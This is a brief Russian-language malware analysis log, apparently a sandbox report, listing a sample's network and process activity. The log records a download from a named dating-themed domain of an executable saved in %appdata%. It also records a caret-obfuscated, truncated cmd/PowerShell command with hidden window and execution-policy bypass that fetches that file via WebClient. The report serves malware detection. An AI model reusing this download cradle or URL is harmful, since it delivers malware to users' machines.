Техническая информация
- http://swirldatingonline.com/foma1402_2_cr347.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poweRs^h^ELl.^EXe -Exe^C^U^Ti^ON^Po^liCY B^y^pA^sS^ -nopROF^I^LE ^-^W^in^doW^sT^Y^Le^ hI^D^dEn^ (N^ew-O^bJEct sYs^t^Em^.^nE^t.WEb^C^lIe^NT).^d^O^W^nL^O^A^dF^iLe^(^'http://swir...
- 'sw#####tingonline.com':80
- http://sw#####tingonline.com/foma1402_2_cr347.exe
- DNS ASK sw#####tingonline.com
- '<SYSTEM32>\cmd.exe' /c "poweRs^h^ELl.^EXe -Exe^C^U^Ti^ON^Po^liCY B^y^pA^sS^ -nopROF^I^LE ^-^W^in^doW^sT^Y^Le^ hI^D^dEn^ (N^ew-O^bJEct sYs^t^Em^.^nE^t.WEb^C^lIe^NT).^d^O^W^nL^O^A^dF^iLe^(^'http://swir...' (со скрытым окном)